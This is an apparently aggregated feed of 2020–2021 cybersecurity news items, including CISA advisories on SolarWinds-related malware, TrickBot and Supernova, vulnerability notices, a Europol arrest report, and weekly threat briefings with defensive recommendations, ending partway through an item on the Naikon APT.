Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations. Cisco Talos’ previous research has mainly linked this…

[[ This is only the beginning! Please visit the blog for the complete entry ]]

flag.png

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

AR21-112A

flag.png

Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

 

This product is provided subject to this Notification and this Privacy & Use policy.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface continues to expand for critical infrastructure with owners and operators adopting new technologies to improve operational efficiencies, the increased vulnerabilities and targeting of ICS systems and OT networks is expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.

flag.png

Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.

This product is provided subject to this Notification and this Privacy & Use policy.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

SDfb.jpg

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

11/20/2020

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

twitterbitacora.png

Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.

20/11/2020

Etiquetas:
Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas

Referencias:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

 

 

Read on:

 

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

fed-up-person-laptop.jpg

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 

READ NEXTIIoT smart factories are leaving doors open for cyber attacks

But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector. Allegedly determined to be North Korean hackers, attempts have been thwarted but could easily have led to attacks that could devastate the infrastructure of the country. As far back as 2015, a hack of Ukraine’s power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of ICS computers on its watch had been attacked by malicious malware at least once in the first half of 2018. 

In the same year, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut, leading to “massive” damage to the plant, but no reported loss of life. 

These types of incidents on cyber-physical security (CPS) are fortunately rare but set to rapidly increase in the coming years due to a lack of security focus and spending. If business leaders don’t act, they could be held personally accountable when something goes wrong. 

Industrial robots are welding metal part in factory

Industrial robots are welding metal part in factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”

YOU MIGHT LIKE

IOT

IIoT smart factories are leaving doors open for cyber attacks

With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Colbalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 916000.png

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

Android banking trojan, Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.Recommendation: Users should be cautious when downloading Android applications, with malicious apps occasionally bypassing Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies have been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola, Nintendo, among many others. Within the source code the developers’ names, along with hardcoded credentials have been found.Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, a misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity, and cause significant harm to a company’s reputation.Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records which included addresses birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell the breach on a hacker forum, however, they ended up releasing the database for free on another site.Recommendation: Dave is requiring all users to do a password reset, however, users need to be aware they are still at risk if they are using the same password for other sites as well.Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigations (FBI) and FireEye both have confirmed a series of campaigns by the Russian GRU associated APT28, aka Fancy Bear. These attacks began in December of 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US Government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spaying and brute force. The long term motivation behind these attacks is not clear, but are likely a variation of the past motives of APT28, including US election meddling, and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US Energy Sector is especially troubling as APT28 is believed to have been behind previous attacks against US and Ukrainian Energy infrastructure and Industry Control Systems (ICS).Recommendation: Defense in-depth, along with well designed and regular employee training is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store, this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used, arguably the servers have almost full control of a users phone exhibiting similarities to a malware C&C server. The app also uses auto-debugging and encryption techniques to stop security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and argued that the US DHS had found no evidence of suspicious data transmission.Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down while also sending notes to its Taiwanese factories that there would be, “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company, several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and Bitpaymer attacks. Garmin has currently not commented on a potential attack.Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime,

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to North Korea based Lazarus APT group. The framework has been used by the threat actors since April 2018 and targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims like distributing VHD ransomware and querying victim databases for acquiring customer lists. Analysis revealed that a variant of Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool we call RDAT using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing as an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or use XOR encoding making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014 continuously using variants of MgBot throughout.Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks utilizing the tools from e-crime group Golden Chickens who provide Malware-as-a-Service (MaaS) throughout March and April. Researchers attributed each attack with confidence varying from low to moderate to groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools such as TerraLoader, more_eggs, and VenomLNK with new features that incorporate anti-analysis techniques, new string obfuscation and brute force implementation. Golden Chickens MaaS remains as a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.Recommendation: Financially themed malspam emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electron communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191Tags: Terra loader, Golden chickens

MAR-17-352-01 HatMan—Safety System Targeted Malware. This malware analysis report discusses the components and capabilities of the HatMan malware and some potential mitigations. Media reporting also refers to this malware as both TRITON and TRISIS.

This updated malware analysis report is a follow-up to the updated malware analysis report titled MAR-17-352-01 HatMan – Safety System Targeted Malware (Updated A) that was published April 10, 2018, on the ICS-CERT website.

More malware designed for air-gapped systems. A British utility sustains a ransomware attack. The US Cyberspace Solarium Commission sees lessons in the pandemic for cybersecurity. Contact-tracing technologies take a step back,maybe a step or two forward. Rob Lee from Dragos comparing the state of ICS security around the world, our guest is Ian Pitt from LogMeIn on lessons learned working remotely during COVID-19. Criminals increase ransomware attacks on hospitals, and swap templates to impersonate government relief agencies.

For links to all of today’s stories check out our CyberWire daily news brief:

https://thecyberwire.com/newsletters/daily-briefing/9/95

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Bugs, Exploit, Healthcare Attacks, Naikon, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 793547.pngFigure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Bugs in Two Related WordPress Plugins Together Risked Over 1 Million Websites

(published: May 10, 2020)

Two critical-severity WordPress plugin vulnerabilities have been identified by the Wordfence security team which could impact over a million WordPress websites. The two plugins affected are Elementor Pro and Ultimate Addons for Elementor, and the researchers have observed active exploitation of the vulnerabilities. Exploiting the Elementor Pro plugin allows for remote code execution attacks, granting a malicious actor the ability to gain full administrative access to WordPress if the site has open user registration. Websites with the “open user registration” option disabled can be exploited using the Ultimate Addons for Elementor registration bypass vulnerability. Developers behind both plugins have patched the flaws in Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2.Recommendation: Users of these WordPress plugins should ensure they are using Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2 or newer which include fixes to the vulnerabilities. All website owners, especially those using WordPress, should keep their installations and plugins up to date to ensure patches are installed as soon as they are available.Tags: Vulnerabilities, WordPress, Plugin, Registration bypass, Remote code execution

Hacker Group Floods Dark Web with Data Stolen From 11 Companies

(published: May 9, 2020)

The threat group known as Shiny Hunters are selling millions of user records for 11 different companies on an undisclosed dark web marketplace. The databases being sold include a combined total of 164.2 million user records, and have been steadily streamed to the marketplace since the beginning of May 2020. As of the time of this writing, the prices for each database ranges between $500 and $5,000 USD. The first reported database belongs to Tokopedia, an Indonesian online store, with over 90 million user records. The other companies reportedly involved are Bhinneka, ChatBooks, Chronicle Of Higher Education, Ggumim, HomeChef, Mindful, Minted, StarTribune, Styleshare, and Zoosk. The affected companies have been contacted by Bleeping Computer, as the data breaches appear legitimate, despite not being 100% confirmed.Recommendation: Individuals that have accounts with any of the impacted companies are strongly advised to change their login credentials immediately. Additionally, it is important to not reuse passwords for multiple sites and services. If the same credentials are used on any other sites, it is suggested that those accounts also be updated with new, unique passwords.Tags: Data breach, Shiny Hunters, Dark web marketplace

Naikon APT: Cyber Espionage Reloaded

(published: May 7, 2020)

